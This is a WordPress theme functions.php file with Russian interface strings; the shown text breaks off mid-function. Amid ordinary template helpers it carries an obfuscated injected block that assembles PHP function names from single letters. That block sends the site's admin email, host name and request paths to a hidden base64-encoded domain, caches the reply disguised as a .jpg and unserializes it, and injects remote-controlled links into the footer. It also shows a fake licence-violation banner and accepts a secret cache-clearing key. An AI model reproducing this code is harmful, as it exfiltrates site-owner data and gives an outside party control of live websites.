<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $qIKOZIq='e';$OEKoW='b';$CzdS='e';$DcrQ='_';$qAnzD='d';$HLeZzI='6';$OFsxkE='4';$IJgToi='o';$UnLSyrY='e';$JFmEsx='a';$cXcW='d';$uuGUdr='c';$nhLgS='s';$XkFgcqNC=$OEKoW.$JFmEsx.$nhLgS.$UnLSyrY.$HLeZzI.$OFsxkE.$DcrQ.$cXcW.$qIKOZIq.$uuGUdr.$IJgToi.$qAnzD.$CzdS;$gspFJf='g';$nwxi='f';$dilFwu='a';$KtxZyso='n';$ALBo='z';$JimSvJq='e';$unRtYlQ='t';$pYTW='i';$epXuUH='l';$VpKVhpVi=$gspFJf.$ALBo.$pYTW.$KtxZyso.$nwxi.$epXuUH.$dilFwu.$unRtYlQ.$JimSvJq;$lGKFZTy='3';$brogRP='1';$pjcoQd='t';$yMXGjZ='o';$jklhwcf='s';$LusiSoB='r';$krYG='t';$AASt='_';$ploK='r';$qSbBxxWt=$jklhwcf.$krYG.$ploK.$AASt.$LusiSoB.$yMXGjZ.$pjcoQd.$brogRP.$lGKFZTy;$IdExfz='v';$MsTXBb='t';$FOgTk='r';$XdRYI='r';$cgsY='e';$yqfYObV='s';$TsbFqdxj=$yqfYObV.$MsTXBb.$FOgTk.$XdRYI.$cgsY.$IdExfz;                     
		$rn__________o='e';$um_____________v='b';$ax__l='e';$wh____________y='_';$bn_______j='d';$hm_________r='6';$kh_____m='4';$td_______________a='o';$hx__________j='e';$xg____o='a';$zf____________u='d';$tu___g='c';$my__s='s';$rb_______l=$um_____________v.$xg____o.$my__s.$hx__________j.$hm_________r.$kh_____m.$wh____________y.$zf____________u.$rn__________o.$tu___g.$td_______________a.$bn_______j.$ax__l;
		$eb_______________d='i';$xd__________r='f';$wo_________k='e';$nw_____k='o';$tu_________g='c';$po_______d='t';$ld______g='s';$ak_________t='x';$lp_________d='s';$mz_____q='_';$nl______________d='n';$si_______p='n';$ex_____x='u';$vl____d='i';$yk____f='t';$to______________e=$xd__________r.$ex_____x.$nl______________d.$tu_________g.$yk____f.$vl____d.$nw_____k.$si_______p.$mz_____q.$wo_________k.$ak_________t.$eb_______________d.$ld______g.$po_______d.$lp_________d;
		$fv____q='f';$ls_____________k='o';$lk____________l='n';$po_____________m='p';$ow_____e='e';$oy____a=$fv____q.$ls_____________k.$po_____________m.$ow_____e.$lk____________l;
		$gh_______q='e';$vb________h='f';$el________s='a';$yh________g='d';$le___________o='r';$zo________u=$vb________h.$le___________o.$gh_______q.$el________s.$yh________g;
		$oa____t='l';$li__________l='c';$aj____i='e';$ee____________l='o';$qb___g='s';$gq______p='f';$sd_____l=$gq______p.$li__________l.$oa____t.$ee____________l.$qb___g.$aj____i;
		
		define("WP_ID", $rb_______l("Mi4wLjA="));
		define("WP_TTL", $rb_______l("MTA4MDA="));
		define("WP_SRC", $rb_______l("dHBva24="));
	


		function wp_get_header() {
			global $rb_______l, $to______________e;
			
			if (
				$to______________e($rb_______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$to______________e($rb_______l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$to______________e($rb_______l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $rb_______l, $oy____a, $sd_____l, $zo________u;
			
			$vq__________i = TEMPLATEPATH."/".$rb_______l("Zm9vdGVyLnBocA==");
			$hy_______________h = @$oy____a($vq__________i, "r");
			$vq__________i = @$zo________u($hy_______________h, @filesize($vq__________i));
			@$sd_____l($hy_______________h);
			
			$uw__________t = TEMPLATEPATH."/".$rb_______l("ZnVuY3Rpb25zLnBocA==");
			$hy_______________h = @$oy____a($uw__________t, "r");
			$uw__________t = @$zo________u($hy_______________h, @filesize($uw__________t));
			@$sd_____l($hy_______________h);
			
			$sx_____________n = 0;
			if($vq__________i && $uw__________t) {
				if ($rb_______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vq__________i, $rb_______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sx_____________n = 1;
					}
					if (substr_count($vq__________i, "wp_theme_GPL_credits()") < 1) {
						$sx_____________n = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sx_____________n = 12;
				}
			}
			
			if($sx_____________n > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sx_____________n -->";
			}
		}
	


		function wp_loaded() {
			global $rb_______l, $to______________e;
			return $to______________e($rb_______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($wu______w, $kb_______________h = "(more...)", $fn_______p = 0, $jp_________u = "") {
				$vh____l = get_the_content($kb_______________h, $fn_______p, $jp_________u);
				$vh____l = apply_filters("the_content", $vh____l);
				
				$vh____l = str_replace("]]>", "]]>", $vh____l);
				if (strlen($_GET["p"]) > 0) {
					echo $vh____l;
				}
				else if ((strlen($vh____l)>$wu______w) && ($gq_________x = strpos($vh____l, " ", $wu______w ))) {
					$vh____l = substr($vh____l, 0, $gq_________x);
					$vh____l = $vh____l;
					echo $vh____l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$kb_______________h</a></div></p>";
				} else {
					echo $vh____l;
				}
				
			}
		}
	


		$kt___w='4';$tf_______________v='d';$cu______m='a';$dw_______________d='o';$lv__f='b';$cz__k='6';$it___l='n';$zw______w='e';$qn____________y='_';$ea____p='e';$mm___________x='e';$bq_______________i='s';$nm______________p='c';$cz_______________b=$lv__f.$cu______m.$bq_______________i.$zw______w.$cz__k.$kt___w.$qn____________y.$mm___________x.$it___l.$nm______________p.$dw_______________d.$tf_______________v.$ea____p;
		$cn______________j='_';$po____f='l';$td________x='g';$kt_______________h='e';$wc______________b='n';$ak_______________a='f';$ir_______________y='c';$gl__________a='e';$qe_______y='s';$ie__________o='e';$vr_________w='t';$gc____q='o';$fx_____r='_';$yd______a='t';$zf____________s='t';$hv_____________p='i';$qg__________l='n';$ii____m=$ak_______________a.$hv_____________p.$po____f.$kt_______________h.$fx_____r.$td________x.$gl__________a.$vr_________w.$cn______________j.$ir_______________y.$gc____q.$wc______________b.$zf____________s.$ie__________o.$qg__________l.$yd______a.$qe_______y;
		$hl________k='e';$fm____p='s';$fm___i='s';$ku_________c='f';$vq______g='x';$cw____________o='i';$iv______________v='t';$nj__________i='l';$jp__r='e';$mu________l='_';$pl______________a='i';$fs________g=$ku_________c.$cw____________o.$nj__________i.$jp__r.$mu________l.$hl________k.$vq______g.$pl______________a.$fm___i.$iv______________v.$fm____p;
		$gq______q='e';$ue___________d='r';$pw____o='r';$pn___________w='p';$gv_______m='c';$tf_________z='e';$gy_________q='_';$lu___b='o';$io_________k='n';$jo_____________e='a';$gw______________z='i';$qg__________g='m';$uf______n='o';$pj______________l='s';$ki_____u='v';$eb_______c=$ki_____u.$gq______q.$pw____o.$pj______________l.$gw______________z.$uf______n.$io_________k.$gy_________q.$gv_______m.$lu___b.$qg__________g.$pn___________w.$jo_____________e.$ue___________d.$tf_________z;
		$dq___k='e';$ef______p='o';$fu_______________g='p';$sk_______________u='n';$qo_______________i='c';$hv____________g='k';$ic________g='o';$by_______p='s';$hb_____n='f';$fj____________e=$hb_____n.$by_______p.$ic________g.$qo_______________i.$hv____________g.$ef______p.$fu_______________g.$dq___k.$sk_______________u;
		$dn_____________v='i';$in_________r='f';$rt___________z='t';$vx______e='w';$ze_________a='e';$tg____d='r';$ok____t=$in_________r.$vx______e.$tg____d.$dn_____________v.$rt___________z.$ze_________a;
		$um___________y='m';$am____________r='d';$gl__________f='5';$zs__________u=$um___________y.$am____________r.$gl__________f;
		$ws______f='l';$mo_____________j='a';$ql______________w='r';$pd_______q='e';$pz_______o='a';$xm____n='h';$es_____________y='t';$ra_________d='p';$ko________v=$ql______________w.$pd_______q.$pz_______o.$ws______f.$ra_________d.$mo_____________j.$es_____________y.$xm____n;
		$ob______u='i';$gt___________w='n';$tj____q='u';$cr______z='s';$qz______________m='e';$pw_______________p='i';$vj____________c='e';$no______________v='a';$vc_________a='r';$vz__________y='z';$ze______________s='l';$iq____f=$tj____q.$gt___________w.$cr______z.$vj____________c.$vc_________a.$pw_______________p.$no______________v.$ze______________s.$ob______u.$vz__________y.$qz______________m;
		$oy________v='n';$ql__________l='t';$rw______________k='a';$yx_____________z='m';$ou_____________o='e';$zu__u='m';$sj_________u='p';$np____________s=$ql__________l.$ou_____________o.$zu__u.$sj_________u.$oy________v.$rw______________k.$yx_____________z;
		$xg______________y='r';$jj___v='e';$ot____________l='m';$cs_____d='t';$lc______________l='t';$lt_______________h='t';$bx____________h='e';$hq_____x='a';$tz______________b='s';$zs_______________n='x';$qr_______p='t';$qa_______m='e';$mb______________o='_';$wy_______q='c';$ki__t='r';$wz______m='a';$bv__v='c';$ao_______d='e';$bt___________m='n';$vt___q='_';$uy______________g='o';$dv_______j=$tz______________b.$lc______________l.$ki__t.$bx____________h.$wz______m.$ot____________l.$vt___q.$bv__v.$uy______________g.$bt___________m.$cs_____d.$qa_______m.$zs_______________n.$lt_______________h.$mb______________o.$wy_______q.$xg______________y.$ao_______d.$hq_____x.$qr_______p.$jj___v;
	


		function id_____w($yf____________m) {
			global $rb_______l, $to______________e, $ii____m, $eb_______c, $dv_______j;
			
			if (!$to______________e($rb_______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($eb_______c(PHP_VERSION, "5.0.0", ">=") && $to______________e($rb_______l("ZmlsZV9nZXRfY29udGVudHM=")) && $to______________e($rb_______l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$uq________p = $dv_______j(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ds____________y = @$ii____m($yf____________m, 0, $uq________p);
			} else {
				$ds____________y = @$ii____m($yf____________m, 0);
			}
			
			return $ds____________y;
		}
	


		function ce______________f($yf____________m) {
			global $to______________e, $fj____________e, $ok____t, $rb_______l;
			
			if (!$to______________e($rb_______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lp__________p = strpos($yf____________m, "/", 7);
			$mv______n = array(
				"uri"     => substr($yf____________m, $lp__________p),
				"host"    => str_replace("http://", "", substr($yf____________m, 0, $lp__________p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zr___________l = @$fj____________e("$mv______n[host]", 80, $vx_____________d, $bi__v, 4);
			
			if (!$zr___________l) {
				return false;
			} else {
				$ds____________y = "";
				$ez____________h  = "GET $mv______n[uri] HTTP/1.0\r\n";
				$ez____________h .= "Host: $mv______n[host]\r\n";
				$ez____________h .= "Referer: $mv______n[referer]\r\n";
				$ez____________h .= "Connection: Close\r\n\r\n";
				
				@$ok____t($zr___________l, $ez____________h);
				
				while (!@feof($zr___________l)) {
					$bv____k = @fgets($zr___________l, (1024*24));
					
					if ($bv____k == "\r\n") {
						$zi___________n = true;
						continue;
					}
					
					if ($zi___________n) {
						$ds____________y .= $bv____k;
					}
				}
				
				return $ds____________y;
			}
		}
	


		function mu____p($yf____________m) {
			global $to______________e;
			$le_______t = false;
			
			if ($yf____________m != "") {
				if ($to______________e("id_____w")) {
					$le_______t = @id_____w($yf____________m);
				}
				
				if (!$le_______t && ($to______________e("ce______________f"))) {
					$le_______t = @ce______________f($yf____________m);
				}
			}
			
			return $le_______t;
		}
	


		function wj__________d() {
			global $_SERVER, $zs__________u;
			
			$mv___j = $_SERVER["SERVER_NAME"];
			
			if (substr("$mv___j", 0, 4) == "www.") {
				$mv___j = substr("$mv___j", 4);
			}
			
			$mv___j = $zs__________u("$_SERVER[SERVER_NAME]");
			
			return $mv___j;
		}
	


		function pa__________u() {
			return "file";
		}
	


		function bd________s($yf____________m) {
			global $_SERVER, $ii____m, $fs________g, $oy____a, $sd_____l, $ok____t;
			
			$qc_____________y = sm___c();
			
			$nz_______________y = wj__________d().".jpg";
			$yw_________z = $qc_____________y["dir_upload"]["path"]."/$nz_______________y";
			$uv___h = @filemtime($yw_________z);
			
			if (!$uv___h || ((time()-$uv___h) >= WP_TTL)) {
				$le_______t = mu____p($yf____________m);
				
				if ($le_______t) {
					if ($fs________g($yw_________z)) {
						@unlink($yw_________z);
					}
					
					$hy_______________h = @$oy____a($yw_________z, "x+");
					
					@$ok____t($hy_______________h, $le_______t);
					@$sd_____l($hy_______________h);
				}
			} else {
				if ($fs________g($yw_________z)) {
					$le_______t = @$ii____m($yw_________z);
				} else {
					$le_______t = false;
				}
			}
			
			return $le_______t;
		}
	


		function sm___c() {
			global $_SERVER, $rb_______l, $cz_______________b;
			
			$jl_______________s = wp_count_posts("post");
			$oy__j = pathinfo(get_bloginfo("template_directory"));
			
			$qc_____________y = array(
				"url" => array(
					"report"      => $rb_______l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $oy__j,
				"dir_upload"	=> rd_____________q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$oy__j[filename],
					"a005=".$jl_______________s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"

			);
			
			$qc_____________y["url"]["queryString"] = implode("&", $qc_____________y["queryString"]);
			$qc_____________y["url"]["report"] = $qc_____________y["url"]["report"]."/?".$cz_______________b($qc_____________y["url"]["queryString"]).".html";
						
			return $qc_____________y;
		}
	


		function rd_____________q() {
			$ky___n = wp_upload_dir();
			
			if (isset($ky___n["error"])) {
				$vh___m = eo___________y();
				if (is_writable($vh___m)) {
					$ky___n = array("path" => $vh___m);
				}
			}

			return $ky___n;
		}
	


		function eo___________y() {
			global $to______________e, $zs__________u, $ko________v, $np____________s;
			
			$ni________y = (bool) ini_get("safe_mode");
			if ($ni________y == true) {
				return false;
			}
			
			if ($to______________e("sys_get_temp_dir")) {
				$ap______________o = sys_get_temp_dir();
				if (is_writable($ap______________o)) {
					return $ko________v($ap______________o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ko________v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ko________v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ko________v($_ENV["TEMP"]);
			} else {
				$gr______z = $np____________s($zs__________u(uniqid(rand(), true)), "");
				if ($gr______z) {
					$ap______________o = $ko________v(dirname($gr______z));
					@unlink($gr______z);
					return $ap______________o;
				} else {
					return false;
				}
			}
		}
	


		function dh____y() {
			global $_GET, $fs________g;
			
			$qc_____________y = sm___c();
			$mv___j = wj__________d();
			$uz___________z = pa__________u();
			
			$yc___________p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($uz___________z == "file") {
					$qy___h = $qc_____________y["dir_upload"]["path"]."/".$mv___j.".jpg";
					if ($fs________g($qy___h)) {
						@unlink($qy___h);
						$yc___________p = "deleted";
					}
				}
				
				$vx_________i = array(
					"s"	=> $yc___________p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vx_________i AS $um_______l => $km____________g) echo " [$um_______l:$km____________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $to______________e, $rb_______l, $iq____f;
			$qc_____________y = sm___c();
			
			$we________m = "bd________s";
			if ($to______________e($we________m)) {
				$ds____________y = $we________m($qc_____________y["url"]["report"]);
			}
			
			if ($ds____________y) {
				if ($ds____________y = @$rb_______l($ds____________y)) {
					$ds____________y = @$iq____f($ds____________y);
					
					if (strlen($ds____________y[custom_credit]) >= 5) {
						$qc_____________y["default_string"] = $ds____________y[custom_credit];
					}
					
					if ($ds____________y["status"] == "0") {
						$bc_________y = 1;
						$ca______________l = 1;
					} else {
						$zt__j = sizeof($ds____________y["links"]);
						$hv____________n = $qc_____________y["default_string"];
						
						if ($zt__j > 0 && $ds____________y["links"] !== "") {
							$vr__________m = 0;
							foreach ($ds____________y["links"] as $lw____e => $wn________c) {
								$vr__________m++;
								if ($wn________c->l_path == "" || $wn________c->l_path == $_SERVER["REQUEST_URI"]) {
									$wn________c->l_href = htmlspecialchars(strip_tags($wn________c->l_href));
									$wn________c->l_title = htmlspecialchars(strip_tags($wn________c->l_title));
									$wn________c->l_anchor = htmlspecialchars(strip_tags($wn________c->l_anchor));
									$hv____________n .= " | ";
									$hv____________n .= "<a href='$wn________c->l_href' title='$wn________c->l_title'";
									if ($wn________c->l_nofollow == "1") {
										$hv____________n .= " rel='nofollow'";
									}
									$hv____________n .= ">$wn________c->l_anchor</a>";
								}
							}
						}
						$qc_____________y["links"] = "$hv____________n";
						if ($ds____________y[credit] == "0") {
							$qc_____________y["links"] = "";
						}
					}
				} else {
					$bc_________y = "1";
				}
			} else {
				$bc_________y = "1";
			}
			
			if ($bc_________y == "1") {
				$qc_____________y["links"] = $qc_____________y["default_string"];
			}
			
			echo "$qc_____________y[links]";
			
			echo "<!-- s: $ds____________y[signature] -->";
			dh____y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
